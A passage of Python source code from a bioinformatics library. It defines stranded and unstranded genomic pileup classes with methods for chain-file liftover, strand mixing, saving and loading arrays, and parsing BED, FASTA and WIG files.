if chain_type == 'rbest': # use the reciprocal best chain (filtered to one-to-one AKA single coverage in both directions. See http://genomewiki.ucsc.edu/index.php/HowTo:_Syntenic_Net_or_Reciprocal_Best
chain_filename = os.path.join(chain_basepath,
'{}.{}.rbest.chain'.format(toolbox.first_lower(self.build),
toolbox.first_lower(source_pileups.build)))
else: # otherwise use normal chain file (single coverage only in target)
chain_filename = os.path.join(chain_basepath,
'{}To{}.over.chain'.format(toolbox.first_lower(self.build),
toolbox.first_upper(source_pileups.build)))
missing_chroms = set([])
print(('Lifting over from {} using chain file {}'.format(source_pileups.name, chain_filename)))
with open(chain_filename, 'rt') as chain_file:
self._initialize(pileup_dtype=destination_dtype)
new_chain = True
good_chain = False
for line_num, line in enumerate(chain_file):
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Processing line {}'.format(line_num), 1)
# new chain
if new_chain and line != '\n': # insurance against multiple blank lines
header = toolbox.parse_line_dict(line, header_fields, split_char=' ', strict=True)
assert header['dummy'] == 'chain'
new_chain = False
# relative offsets within the chain
ref_chain_pos = 0
query_chain_pos = 0
ref_chrom = toolbox.convert_chroms(header['tName'], dest=source_pileups.chromosome_dialect)
query_chrom = toolbox.convert_chroms(header['qName'], dest=self.chromosome_dialect)
good_chain = False
if ref_chrom in self.spileups:
try:
assert int(header['tSize']) == self.chrom_lengths[ref_chrom]
except AssertionError as ae:
print((
'Error on line {}, chain {}. Chain file size of {} for reference chromosome {} does not match our size of {}'.format(
line_num, header['id'], header['tSize'], ref_chrom,
self.chrom_lengths[ref_chrom])))
raise ae
else:
if query_chrom in source_pileups.spileups:
try:
assert int(header['qSize']) == source_pileups.chrom_lengths[query_chrom]
except AssertionError as ae:
print((
'Error on line {}, chain {}. Chain file size of {} for query chromosome {} does not match source size of {}'.format(
line_num, header['id'], header['qSize'], query_chrom,
source_pileups.chrom_lengths[query_chrom])))
raise ae
else:
good_chain = True
else:
missing_chroms.add(ref_chrom)
ref_chain_start = int(header['tStart'])
query_chain_start = int(header['qStart'])
elif line == '\n':
# start a new chain on the next line
new_chain = True
elif good_chain:
# it must be a data line
split_line = line.split('\t')
size = int(split_line[0])
if len(split_line) == 3:
ref_diff = int(split_line[1])
query_diff = int(split_line[2])
elif len(split_line) == 1:
ref_diff = 0
query_diff = 0
else:
raise Exception(
'Encountered a chain alignment data line of length 2 on line {}. Unsure how to handle this so quitting...'.format(
line_num))
ref_start_pos = ref_chain_start + ref_chain_pos
ref_end_pos = ref_start_pos + size
ref_chain_pos += size + ref_diff
query_start_pos = query_chain_start + query_chain_pos
query_end_pos = query_start_pos + size
query_chain_pos += size + query_diff
for strand in (-1, 1):
self.spileups[ref_chrom][strand][ref_start_pos:ref_end_pos] = \
source_pileups.spileups[query_chrom][strand][
query_start_pos:query_end_pos]
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
if missing_chroms:
print(('The following chromosomes in the chain file were missing in the destination organism: {}'.format(
','.join(sorted(list(missing_chroms))))))
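# For reference, a chain block in the UCSC format consumed above looks like (values hypothetical):
#     chain 4900 chr1 248956422 + 10000 10240 chr1 195471971 + 30000 30240 17
#     90\t3\t3
#     147
# i.e. a space-separated header line ("chain" score tName tSize tStrand tStart tEnd qName qSize
# qStrand qStart qEnd id) followed by tab-separated alignment data lines of "size [dt dq]", with a
# blank line terminating each chain.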
def liftoverWithMappingTable(self, destination_build, destination_chrom_lengths, mapping_table_filename):
"""
Use <mapping_table_filename> to liftover the pileup vectors in <self>
and return it as a new pileup object.
:return:
"""
CHROM_FIELD = 0
DESTINATION_FRAG_START = 4
DESTINATION_INSERTION = 5
DESTINATION_FRAG_END = 6
SOURCE_FRAG_START = 8
SOURCE_INSERTION = 9
SOURCE_FRAG_END = 10
with open(mapping_table_filename, 'rt') as mapping_table:
print(('Lifting over reads to {} using {}...'.format(destination_build, mapping_table_filename)))
lifted_pileups = StrandedPileups(chrom_lengths=destination_chrom_lengths, name=self.name,
build=destination_build,
chromosome_dialect='ensembl')
# lifted_pileups._initialize(0)
table_reader = csv.reader(mapping_table, dialect=csv.excel_tab)
for line_num, line in enumerate(table_reader):
# remember mapping table is 1-based
if line_num % 100000 == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if line[SOURCE_FRAG_START] != line[SOURCE_FRAG_END]:
# print line
chrom = toolbox.convert_chroms(line[CHROM_FIELD], dest=self.chromosome_dialect)
if chrom not in self.spileups:
# break
raise Exception('Found chromosome {} in mapping table but no record of it in {}.'.format(chrom,
self.build))
if chrom not in lifted_pileups.spileups:
# break
raise Exception('Found chromosome {} in mapping table but no record of it in {}.'.format(chrom,
destination_build))
dest_frag_start = int(line[DESTINATION_FRAG_START]) - 1
dest_frag_end = int(line[DESTINATION_FRAG_END]) + 1
source_frag_start = int(line[SOURCE_FRAG_START]) - 1
source_frag_end = int(line[SOURCE_FRAG_END]) + 1
if line[DESTINATION_INSERTION] == r'\N' and line[SOURCE_INSERTION] == r'\N':
if source_frag_end - source_frag_start != dest_frag_end - dest_frag_start:
raise Exception(
'Source ({} bp) and destination ({} bp) fragments not the same size on line {}'.format(
source_frag_end - source_frag_start, dest_frag_end - dest_frag_start, line_num))
else:
try:
for strand in (-1, 1):
lifted_pileups.spileups[chrom][strand][dest_frag_start:dest_frag_end] = \
self.spileups[chrom][strand][
source_frag_start:source_frag_end]
except ValueError as ve:
print((
'Despite checking for this, somehow unequal fragment sizes have slipped through on line {}. Source: {} {} {}, destination: {} {} {}'.format(
line_num, source_frag_start, source_frag_end, source_frag_end - source_frag_start,
dest_frag_start, dest_frag_end, dest_frag_end - dest_frag_start)))
print(('chrom: {}'.format(chrom)))
print(('source chromosome size: {}'.format(self.spileups[chrom][1].shape)))
print(
('destination chromosome size: {}'.format(lifted_pileups.spileups[chrom][1].shape)))
raise ve
return lifted_pileups
def mixDown(self, strand_shift=0, extend=0):
"""
Convert to a standard (unstranded) pileup object using a specified <strand_shift> corresponding
to half the fragment size.
If <extend> is non-zero, extend the signal in the 3' direction by the given amount.
Combining <strand_shift> and <extend> at the same time is currently not supported.
"""
if strand_shift and extend:
raise Exception(
'Using <strand shift> and <extend> at the same time currently not supported (\"Why would you have the stereo and the T.V. on at the same time?\")')
start_time = datetime.datetime.now()
if extend:
print(('Mixing down stranded pileups {} to unstranded using fragment extension of {} bp'.format(self.name,
extend)))
else:
print(('Mixing down stranded pileups {} to unstranded using strand shift of {} bp'.format(self.name,
strand_shift)))
new_pileups = self.singleStrandedEmptyCopy()
for chrom in sorted(self.chrom_lengths, key=lambda x: self.chrom_lengths[x], reverse=True):
new_pileups.pileups[chrom] = numpy.zeros(self.chrom_lengths[chrom], dtype=numpy.float64)
dbg_print('Processing chromosome {}...'.format(chrom), 1)
if numpy.sum(numpy.abs(self.spileups[chrom][-1])) + numpy.sum(numpy.abs(self.spileups[chrom][1])) == 0:
dbg_print('No data in chromosome {}, skipping...'.format(chrom), 1)
else:
for strand in self.spileups[chrom]:
# print '\tStrand: {}'.format(strand)
current_strand = self.spileups[chrom][strand].astype(numpy.float64)
if extend:
new_pileups.pileups[chrom] += current_strand
for i in range(1, extend + 1):
# print '\t\tExtension: {}'.format(i)
if strand == 1:
new_pileups.pileups[chrom][i:] += current_strand[:-i]
else:
new_pileups.pileups[chrom][:-i] += current_strand[i:]
else:
effective_strand_shift = strand * strand_shift
# print 'strand: {}, effective shift: {}'.format(strand, effective_strand_shift)
if effective_strand_shift > 0:
new_pileups.pileups[chrom][effective_strand_shift:] += current_strand[
:-effective_strand_shift]
elif effective_strand_shift < 0:
new_pileups.pileups[chrom][:effective_strand_shift] += current_strand[
- effective_strand_shift:]
else:
new_pileups.pileups[chrom] += current_strand
new_pileups.toType(new_pileups.pileup_dtype)
print(('Done in {}'.format(datetime.datetime.now() - start_time)))
# print 'current chromosomes: {}'.format(new_pileups.pileups.keys())
return new_pileups
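    # Illustrative usage sketch (not part of the original module; the object name and the ~200 bp
    # fragment size are assumptions): mixing a populated StrandedPileups object `stranded` down to
    # an unstranded Pileups object could look like either of the following, but not both at once:
    #   unstranded = stranded.mixDown(strand_shift=100)  # shift each strand by half the fragment size
    #   unstranded = stranded.mixDown(extend=200)        # or extend each read 200 bp in the 3' direction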
def combineStrands(self, binary_func):
"""
Return a new single-stranded pileup resulting from the application of <binary_func> to both strands of self.
:param binary_func:
:return:
"""
output = self.singleStrandedEmptyCopy()
for chrom in self.spileups:
output.pileups[chrom] = binary_func(self.spileups[chrom][-1], self.spileups[chrom][1])
return output
def bindingEnergyToProbability(self, mu, nans_to_zeros=True, pileup_dtype=PILEUP_DTYPE):
"""
Assumes we contain stranded binding energy data. Returns a stranded pileup of binding probabilities for each strand
        given the energies and concentration parameter mu. NaNs will be given a probability of 0 when <nans_to_zeros> is True.
:return:
"""
print('Converting binding energy to probabilities...')
if nans_to_zeros:
print('NaNs -> zero probability')
else:
print('NaNs will be retained')
binding_probs = self.emptyCopy()
self.name += '_binding_probability'
binding_probs.spileups = {}
for chrom in self.spileups:
binding_probs.spileups[chrom] = {}
for strand in self.spileups[chrom]:
binding_probs.spileups[chrom][strand] = motifs.binding_probabilities(
self.spileups[chrom][strand].astype(numpy.float64), mu)
if nans_to_zeros:
binding_probs.spileups[chrom][strand] = numpy.nan_to_num(binding_probs.spileups[chrom][strand])
                if binding_probs.spileups[chrom][strand].dtype != pileup_dtype:
binding_probs.spileups[chrom][strand] = binding_probs.spileups[chrom][strand].astype(pileup_dtype)
return binding_probs
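    # Illustrative usage sketch (the mu value is hypothetical): assuming `energies` holds stranded
    # log binding energies (e.g. from Pileups.computeBindingEnergy), binding probabilities at a
    # concentration parameter mu of -6.0 could be obtained with:
    #   probabilities = energies.bindingEnergyToProbability(mu=-6.0, nans_to_zeros=True)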
def copy(self, dtype=numpy.float64):
"""
Alias for deepCopy()
:param dtype:
:return:
"""
        return self.deepCopy(dtype=dtype)
def deepCopy(self, dtype=numpy.float64):
"""
Returns a new pileups object containing the same data (a deep copy) with an optional change of datatype.
        :param dtype: numpy dtype for the copied chromosome vectors
:return:
"""
new_pu = self.emptyCopy()
for chrom in self.spileups:
new_pu.spileups[chrom] = {}
for strand in self.spileups[chrom]:
new_pu.spileups[chrom][strand] = self.spileups[chrom][strand].astype(dtype)
return new_pu
def shallowCopy(self):
new_pu = self.emptyCopy()
for chrom in self.spileups:
new_pu.spileups[chrom] = {}
for strand in self.spileups[chrom]:
new_pu.spileups[chrom][strand] = self.spileups[chrom][strand]
return new_pu
def emptyCopy(self):
"""
Returns a new pileups object containing the same meta-data but with no pileups data
:return:
"""
new_pu = StrandedPileups(self.chrom_lengths, name=self.name, build=self.build,
chromosome_dialect=self.chromosome_dialect)
new_pu.spileups = {}
new_pu.is_normalized = self.is_normalized
# new_pu.genome_size = self.genome_size
new_pu.coverage = self.coverage
new_pu.total_reads = self.total_reads
new_pu.mean_read_length = self.mean_read_length
new_pu.mode_read_length = self.mode_read_length
new_pu.pileup_dtype = self.pileup_dtype
new_pu.fragment_size = self.fragment_size
return new_pu
def singleStrandedEmptyCopy(self):
"""
Returns a new single-stranded Pileups object containing the same meta-data and no data
:return:
"""
new_pileups = Pileups(chrom_lengths=self.chrom_lengths, name=self.name, build=self.build,
chromosome_dialect=self.chromosome_dialect)
new_pileups.input_filename = self.input_filename
new_pileups.coverage = self.coverage
new_pileups.total_reads = self.total_reads
new_pileups.is_normalized = False
new_pileups.total_read_length = self.total_read_length
new_pileups.mean_read_length = self.mean_read_length
new_pileups.mode_read_length = self.mode_read_length
new_pileups.pileup_dtype = self.pileup_dtype
new_pileups.fragment_size = self.fragment_size
new_pileups.pileups = {}
return new_pileups
def save(self, folder_path, gzipped=True):
print('Saving stranded pileup data to {} ...'.format(folder_path))
toolbox.establish_path(folder_path)
for chrom in toolbox.numerical_string_sort(self.chrom_lengths):
for strand in self.spileups[chrom]:
print('\tSaving chromosome {} strand {}'.format(chrom, strand))
if gzipped:
with gzip.open(os.path.join(folder_path, '{}_{}.npy.gz'.format(chrom, strand)),
'wb') as strand_file:
numpy.save(strand_file, self.spileups[chrom][strand])
else:
numpy.save(os.path.join(folder_path, '{}_{}.npy'.format(chrom, strand)),
self.spileups[chrom][strand])
with open(os.path.join(folder_path, 'meta_data.txt'), 'w') as out_file:
META_DATA_VARS = (self.name, self.build, self.chromosome_dialect, self.is_normalized)
out_file.write(','.join(str(v) for v in META_DATA_VARS))
@classmethod
def load(cls, folder_path, mmap_mode=''):
overall_load_start_time = datetime.datetime.now()
loaded_pileup = cls()
print('Loading pileup data from {} ...'.format(folder_path))
if mmap_mode:
print(
'Loading up to {} chromosomes in mem-mapped mode {} ...'.format(MAX_FILEHANDLES_PER_PILEUP, mmap_mode))
with open(os.path.join(folder_path, 'meta_data.txt'), 'rt') as meta_data_file:
meta_data = meta_data_file.read().strip().split(',')
loaded_pileup.name = str(meta_data[0])
loaded_pileup.build = str(meta_data[1])
loaded_pileup.chromosome_dialect = str(meta_data[2])
loaded_pileup.is_normalized = {'True': True, 'False': False}[meta_data[3]]
mem_mapped_chrom_count = 0
# sort the chromosomes in order of descending size (so that we mem-map the biggest first)
# array_fnames = sorted(os.listdir(folder_path), reverse=True, key=lambda x: loaded_pileup.chrom_lengths[toolbox.parse_path(x)[1].split('_')[0]])
for array_fname in toolbox.numerical_string_sort(os.listdir(folder_path)):
if array_fname.endswith('.npy'):
start_time = datetime.datetime.now()
chrom, strand = toolbox.parse_path(array_fname)[1].split('_')
strand = int(strand)
if chrom not in loaded_pileup.spileups:
loaded_pileup.spileups[chrom] = {}
if mmap_mode and mem_mapped_chrom_count < MAX_FILEHANDLES_PER_PILEUP:
print('\tLoading chromosome {} strand {} mem-mapped ...'.format(chrom, strand))
loaded_pileup.spileups[chrom][strand] = numpy.load(os.path.join(folder_path, array_fname),
mmap_mode=mmap_mode)
mem_mapped_chrom_count += 1
else:
print('\tLoading chromosome {} strand {} ...'.format(chrom, strand))
loaded_pileup.spileups[chrom][strand] = numpy.load(os.path.join(folder_path, array_fname))
loaded_pileup.chrom_lengths[chrom] = len(loaded_pileup.spileups[chrom][strand])
elif array_fname.endswith('.npy.gz'):
start_time = datetime.datetime.now()
chrom, strand = array_fname.split('.')[0].split('_')
strand = int(strand)
if chrom not in loaded_pileup.spileups:
loaded_pileup.spileups[chrom] = {}
print('\tLoading chromosome {} strand {} ...'.format(chrom, strand))
with gzip.open(os.path.join(folder_path, array_fname), 'rb') as strand_file:
loaded_pileup.spileups[chrom][strand] = numpy.load(strand_file)
loaded_pileup.chrom_lengths[chrom] = len(loaded_pileup.spileups[chrom][strand])
print('\tDone loading in {}'.format(datetime.datetime.now() - start_time))
loaded_pileup.pileup_dtype = list(list(loaded_pileup.spileups.values())[0].values())[0].dtype
# loaded_pileup.genome_size = sum(loaded_pileup.chrom_lengths.values())
        print('Done loading {} from files in {}'.format(loaded_pileup.name, datetime.datetime.now() - overall_load_start_time))
        return loaded_pileup
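    # Illustrative usage sketch (the path is a placeholder): round-tripping a StrandedPileups
    # object through disk; mem-mapping on reload only applies to uncompressed .npy files, so this
    # example saves with gzipped=False:
    #   stranded.save('/tmp/my_stranded_pileup', gzipped=False)
    #   reloaded = StrandedPileups.load('/tmp/my_stranded_pileup', mmap_mode='r')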
def flatten(self):
"""
        Returns a flat vector consisting of the negative strands of all chromosomes concatenated in sorted chromosome
        order, followed by the positive strands concatenated in the same order
:return:
"""
flat_vector = numpy.zeros(
sum([len(s[-1]) for s in list(self.spileups.values())]) + sum(
[len(s[1]) for s in list(self.spileups.values())]))
offset = 0
for strand in (-1, 1):
            for chrom in toolbox.numerical_string_sort(self.spileups):
l = len(self.spileups[chrom][strand])
flat_vector[offset:offset + l] = self.spileups[chrom][strand]
offset += l
return flat_vector
    def trimChromosomes(self, chromosomes_to_include=None, chromosomes_to_exclude=None):
        if chromosomes_to_include:
            new_chromosomes = set(chromosomes_to_include)
        else:
            new_chromosomes = set(self.spileups.keys())
        if chromosomes_to_exclude:
            new_chromosomes.difference_update(set(chromosomes_to_exclude))
        print('Trimming chromosomes to only include: {}'.format(', '.join(sorted(new_chromosomes))))
        for chrom in list(self.spileups.keys()):
            if chrom not in new_chromosomes:
                del self.spileups[chrom]
        for chrom in list(self.chrom_lengths.keys()):
            if chrom not in new_chromosomes:
                del self.chrom_lengths[chrom]
def apply(self, func):
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = func(self.spileups[chrom][strand])
def clip(self, min_value=0, max_value=1):
"""
        Constrains the pileup vectors to be between :param:`min_value` and :param:`max_value`
by applying the numpy.clip function.
"""
print('Clipping pileup values to be between {} and {}'.format(min_value, max_value))
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.clip(self.spileups[chrom][strand], a_min=min_value, a_max=max_value)
def smooth(self, gaussian_kernel_bandwidth=45):
"""
Smooth chromosome vectors with a gaussian kernel of width <gaussian_kernel_bandwidth>
:param gaussian_kernel_bandwidth:
:return:
"""
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = scipy.ndimage.gaussian_filter1d(
self.spileups[chrom][strand].astype(float),
sigma=gaussian_kernel_bandwidth)
def toType(self, pileup_dtype=PILEUP_DTYPE):
"""
Converts all pileup chromosome vectors to the specified data type
:param pileup_dtype:
:return:
"""
self.pileup_dtype = pileup_dtype
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = self.spileups[chrom][strand].astype(pileup_dtype)
def astype(self, pileup_dtype=PILEUP_DTYPE):
"""
Analogous to the numpy.astype() method, returns a new stranded pileup
with chromosome data in the specified data type.
:param pileup_dtype:
:return:
"""
new_pileup = self.emptyCopy()
new_pileup.pileup_dtype = pileup_dtype
for chrom in self.spileups:
new_pileup.spileups[chrom] = {}
for strand in self.spileups[chrom]:
new_pileup.spileups[chrom][strand] = self.spileups[chrom][strand].astype(pileup_dtype)
return new_pileup
def memMap(self, writable=True, tmp_dir=NETWORK_TMP_DIR):
"""
Converts pileup chromosome vectors to mem_mapped arrays on disk.
"""
self.save_path = os.path.join(tmp_dir, 'pileup_{}'.format(self.id))
if not os.path.exists(self.save_path):
os.makedirs(self.save_path)
max_chroms_to_map = min(len(self.spileups), MAX_FILEHANDLES_PER_PILEUP)
for chrom in sorted(self.spileups, key=lambda x: len(list(self.spileups[x].values())[0]), reverse=True)[
:max_chroms_to_map]:
for strand in self.spileups[chrom]:
vector_fname = os.path.join(self.save_path, '{}_{}.npy'.format(chrom, strand))
numpy.save(vector_fname, self.spileups[chrom][strand])
self.spileups[chrom][strand] = numpy.load(vector_fname, mmap_mode=('r', 'r+')[writable])
def oneStrand(self, strand):
"""
Returns a Pileups object comprised of only the positive (for <strand> = 1) or negative (for <strand> = -1) strands
"""
# start_time = datetime.datetime.now()
new_pileups = Pileups(chrom_lengths=self.chrom_lengths, name=self.name, build=self.build,
chromosome_dialect=self.chromosome_dialect)
new_pileups.input_filename = self.input_filename
# new_pileups.max_height = self.max_height
new_pileups.coverage = self.coverage
new_pileups.total_reads = self.total_reads
# new_pileups.genome_size = self.genome_size
new_pileups.is_normalized = False
new_pileups.total_read_length = self.total_read_length
new_pileups.mean_read_length = self.mean_read_length
new_pileups.mode_read_length = self.mode_read_length
new_pileups.pileup_dtype = self.pileup_dtype
new_pileups.fragment_size = self.fragment_size
new_pileups.pileups = {}
for chrom in self.spileups:
new_pileups.pileups[chrom] = self.spileups[chrom][strand]
# print 'Done in {}'.format(datetime.datetime.now() - start_time)
return new_pileups
class Pileups(object):
"""
Container for a dictionary of chromosome-length vectors, each containing the number of reads covering that location.
Includes methods for loading from various aligned-read file formats, and for normalizing to coverage
"""
def __init__(self, chrom_lengths={}, input_filename='', name='', build='', strand_shift=0,
pileup_dtype=PILEUP_DTYPE,
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT):
self.id = toolbox.random_identifier(32)
self.pileup_dtype = pileup_dtype
self.save_path = None
self.chromosome_dialect = chromosome_dialect
self.chrom_lengths = {}
for chrom in chrom_lengths:
translated_chrom = toolbox.convert_chroms(chrom, dest=self.chromosome_dialect)
self.chrom_lengths[translated_chrom] = chrom_lengths[chrom]
self.is_normalized = False
self.name = name.replace(',', '_')
self.build = build
self.pileups = {}
self.read_counts = {}
self.total_read_length = 0
self.total_reads = 0
self.coverage = 0
self.mean_read_length = 0
self.mode_read_length = 0
# self.max_height = -1
print(('Initialized new pileup object: {}, genome build: {}, chromosome dialect: {}'.format(self.name,
self.build,
self.chromosome_dialect)))
if input_filename:
self.loadFromBed(input_filename, strand_shift=strand_shift)
def __del__(self):
if self.save_path and os.path.exists(self.save_path):
try:
shutil.rmtree(self.save_path)
except (OSError, IOError) as ex:
print('Tried to delete {} but caught {} instead'.format(self.save_path, ex))
@property
def genome_size(self):
return sum(self.chrom_lengths.values())
def save(self, folder_path, gzipped=True):
print('Saving pileup data to {} ...'.format(folder_path))
toolbox.establish_path(folder_path)
for chrom in toolbox.numerical_string_sort(self.chrom_lengths):
print('\tSaving chromosome {}'.format(chrom))
if gzipped:
with gzip.open(os.path.join(folder_path, '{}.npy.gz'.format(chrom)), 'wb') as chrom_file:
numpy.save(chrom_file, self.pileups[chrom])
else:
numpy.save(os.path.join(folder_path, '{}.npy'.format(chrom)), self.pileups[chrom])
with open(os.path.join(folder_path, 'meta_data.txt'), 'w') as out_file:
META_DATA_VARS = (self.name, self.build, self.chromosome_dialect, self.is_normalized, self.mode_read_length)
out_file.write(','.join(str(v) for v in META_DATA_VARS))
@classmethod
def load(cls, folder_path, mmap_mode=''):
"""
Returns a Pileup object loaded from :param:`folder_path`
"""
loaded_pileup = cls()
overall_load_start_time = datetime.datetime.now()
print('Loading pileup data from {} ...'.format(folder_path))
if mmap_mode:
print('Loading up to {} chromosomes in mem-mapped mode {}'.format(MAX_FILEHANDLES_PER_PILEUP, mmap_mode))
with open(os.path.join(folder_path, 'meta_data.txt'), 'rt') as meta_data_file:
meta_data = meta_data_file.read().strip().split(',')
loaded_pileup.name = str(meta_data[0])
loaded_pileup.build = str(meta_data[1])
loaded_pileup.chromosome_dialect = str(meta_data[2])
loaded_pileup.is_normalized = {'True': True, 'False': False}[meta_data[3]]
loaded_pileup.mode_read_length = int(meta_data[4])
mem_mapped_chrom_count = 0
for array_fname in toolbox.numerical_string_sort(os.listdir(folder_path)):
if array_fname.endswith('.npy'):
chrom = toolbox.parse_path(array_fname)[1]
start_time = datetime.datetime.now()
if mmap_mode and mem_mapped_chrom_count < MAX_FILEHANDLES_PER_PILEUP:
print('\tLoading chromosome {} mem-mapped'.format(chrom))
loaded_pileup.pileups[chrom] = numpy.load(os.path.join(folder_path, array_fname), mmap_mode=mmap_mode)
mem_mapped_chrom_count += 1
else:
print('\tLoading chromosome {}'.format(chrom))
loaded_pileup.pileups[chrom] = numpy.load(os.path.join(folder_path, array_fname))
loaded_pileup.chrom_lengths[chrom] = len(loaded_pileup.pileups[chrom])
# print '\tDone loading in {}'.format(datetime.datetime.now() - start_time)
elif array_fname.endswith('.npy.gz'):
chrom = array_fname.split('.')[0]
start_time = datetime.datetime.now()
print('\tLoading chromosome {}'.format(chrom))
with gzip.open(os.path.join(folder_path, array_fname), 'rb') as chrom_file:
loaded_pileup.pileups[chrom] = numpy.load(chrom_file)
loaded_pileup.chrom_lengths[chrom] = len(loaded_pileup.pileups[chrom])
# print '\tDone loading in {}'.format(datetime.datetime.now() - start_time)
loaded_pileup.pileup_dtype = list(loaded_pileup.pileups.values())[0].dtype
# self.genome_size = sum(loaded_pileup.chrom_lengths.values())
print('Done loading {} from files in {}'.format(loaded_pileup.name, datetime.datetime.now() - overall_load_start_time))
return loaded_pileup
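    # Illustrative usage sketch (the path is a placeholder): persisting a Pileups object and
    # reloading it read-only and mem-mapped, which keeps the large chromosome vectors on disk:
    #   pileup.save('/tmp/my_pileup', gzipped=False)
    #   reloaded = Pileups.load('/tmp/my_pileup', mmap_mode='r')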
def _initialize(self, pileup_dtype=None, fill_value=None):
if pileup_dtype:
self.pileup_dtype = pileup_dtype
self.pileups = {}
self.read_counts = {}
        if fill_value is None:
            if self.pileup_dtype == str:
fill_value = ''
else:
fill_value = 0
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.full(self.chrom_lengths[chrom], fill_value=fill_value, dtype=self.pileup_dtype)
self.read_counts[chrom] = 0
self.is_normalized = False
self.total_read_length = 0
self.total_reads = 0
self.coverage = 0
self.mean_read_length = 0
self.mode_read_length = 0
# self.max_height = -1
def loadFromFasta(self, fasta_filename, upper_only=True):
"""
Populates itself with the genome sequence taken from <fasta_filename>. If <upper_only> is set,
convert all nucleotides to upper-case.
:param fasta_filename:
:return:
"""
start_time = datetime.datetime.now()
self.dtype = numpy.character
with open(fasta_filename, 'rt') as fasta_file:
print('Loading genome sequence from {}...'.format(fasta_filename))
self.pileups = {}
for chrom, seq in list(toolbox.parse_fasta_dict(fasta_file.read()).items()):
translated_chrom = toolbox.convert_chroms(chrom, dest=self.chromosome_dialect)
self.pileups[translated_chrom] = numpy.array(list((seq, seq.upper())[upper_only]), dtype=self.dtype)
only_in_fasta = set(self.pileups.keys()).difference(set(self.chrom_lengths.keys()))
print('Done loading genome in {}'.format(datetime.datetime.now() - start_time))
if only_in_fasta:
print(
'The following chromosomes were present in the FASTA file but not in the length dictionary: {}'.format(
', '.join(list(only_in_fasta))))
only_in_self = set(self.chrom_lengths.keys()).difference(set(self.pileups.keys()))
if only_in_self:
            print('The following chromosomes were present in the length dictionary but not in the FASTA file: {}'.format(
', '.join(list(only_in_self))))
def loadFromBed(self, tagalign_filename, strand_shift=0):
"""
Populate the pileup vector from a BED file (each genomic position will contains a count of the number of BED regions that overlap it)
Will shift + strand reads by - <strand_shift> and - strand reads by <strand_shift>.
If strand_shift is None, compute the strand shift automatically using cross-correlation
"""
start_time = datetime.datetime.now()
self._initialize()
self.input_filename = tagalign_filename
self.read_length_counts = collections.defaultdict(lambda: 0)
missing_chroms = set([])
with open(tagalign_filename, 'rt') as tag_file:
print('Computing pileup vectors from reads in {}.'.format(tagalign_filename))
# print 'Chromosome dialect for BED file specified as: \'{}\''.format(reads_chromosome_dialect)
print('Using strand shift of {}'.format(strand_shift))
for line_num, line in enumerate(tag_file):
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Reading line {}'.format(line_num), 1)
split_line = line.strip().split('\t')
                if line.strip():  # skip blank lines
chrom = toolbox.convert_chroms(split_line[0], dest=self.chromosome_dialect)
# print split_line
if len(split_line) >= 6:
strand = {'+': 1, '-': -1}[split_line[5]]
else:
strand = 0
if chrom in self.pileups:
self.read_counts[chrom] += 1
start_pos = int(split_line[1]) + strand * strand_shift
end_pos = int(split_line[2]) - 1 + strand * strand_shift
read_length = end_pos - start_pos + 1
self.total_read_length += read_length
self.read_length_counts[read_length] += 1
self.pileups[chrom][start_pos:end_pos] += 1
else:
if chrom not in missing_chroms:
dbg_print('Chromosome {} not found in self!'.format(chrom), 1)
missing_chroms.add(chrom)
self.total_reads = sum(self.read_counts.values())
if self.total_reads > 0:
self.mean_read_length = self.total_read_length / float(self.total_reads)
else:
self.mean_read_length = 0
print('Done reading file.')
if missing_chroms:
print(
'\tThe following chromosomes were present in the bed file but not in the length dictionary: {}'.format(
', '.join(sorted(list(missing_chroms)))))
self.mode_read_length = max(list(self.read_length_counts.items()), key=lambda x: x[1])[0]
self.computeCoverage()
print('Done in {}.'.format(datetime.datetime.now() - start_time))
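    # Illustrative usage sketch (file name, build and chromosome lengths are made up): building a
    # read pileup from a tagAlign/BED file, shifting each read toward the fragment midpoint:
    #   chrom_lengths = {'1': 248956422, '2': 242193529}
    #   reads = Pileups(chrom_lengths=chrom_lengths, name='my_sample', build='hg38')
    #   reads.loadFromBed('my_sample.tagAlign', strand_shift=100)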
def loadFromWig(self, wig_filename, pileup_dtype=PILEUP_DTYPE):
"""
Populate with the annotated values from a WIG file.
All chromosomes must be in a single file (since the arrays are initialized
at the beginning of this method)
"""
start_time = datetime.datetime.now()
self._initialize(pileup_dtype=numpy.float64)
populated_count = 0
missing_chroms = set([])
with open(wig_filename, 'rt') as wig_file:
print('Populating from WIG file {}'.format(wig_filename))
for line_num, line in enumerate(wig_file):
if line_num % 1e6 == 0:
dbg_print('Reading line {}.'.format(line_num), 1)
if line != '\n':
line = line.strip()
split_line = re.split(WHITESPACE, line)
if line.startswith('track'): # it's a track definition line
# so ignore it for now
pass
# declaration lines
elif line.startswith('fixedStep'):
split_line = line.split(' ')
if len(split_line) > 5 or len(split_line) < 4:
raise Exception(
'Invalid number of fields ({}) on line {}'.format(len(split_line), line_num))
field_split = split_line[1].split('=')
if field_split[0] != 'chrom':
raise Exception('Missing field "chrom" on line {}'.format(line_num))
else:
chrom = toolbox.convert_chroms(field_split[1], dest=self.chromosome_dialect)
field_split = split_line[2].split('=')
if field_split[0] != 'start':
raise Exception('Missing field "start" on line {}'.format(line_num))
else:
region_start = int(field_split[1])
if len(split_line) >= 4:
field_split = split_line[3].split('=')
if field_split[0] != 'step':
raise Exception('Missing field "step" on line {}'.format(line_num))
else:
step = int(field_split[1])
else:
step = 1
if len(split_line) == 5:
field_split = split_line[4].split('=')
if field_split[0] != 'span':
raise Exception('Missing field "span" on line {}'.format(line_num))
else:
span = int(field_split[1])
else:
span = 1
if chrom in self.pileups: # only process if we have this chromosome
region_type = 'fixed'
offset = 0
else:
missing_chroms.add(chrom)
region_type = None
elif line.startswith('variableStep'):
split_line = line.split(' ')
if len(split_line) > 3 or len(split_line) < 2:
raise Exception(
'Invalid number of fields ({}) on line {}'.format(len(split_line), line_num))
field_split = split_line[1].split('=')
if field_split[0] != 'chrom':
raise Exception('Missing field "chrom" on line {}'.format(line_num))
else:
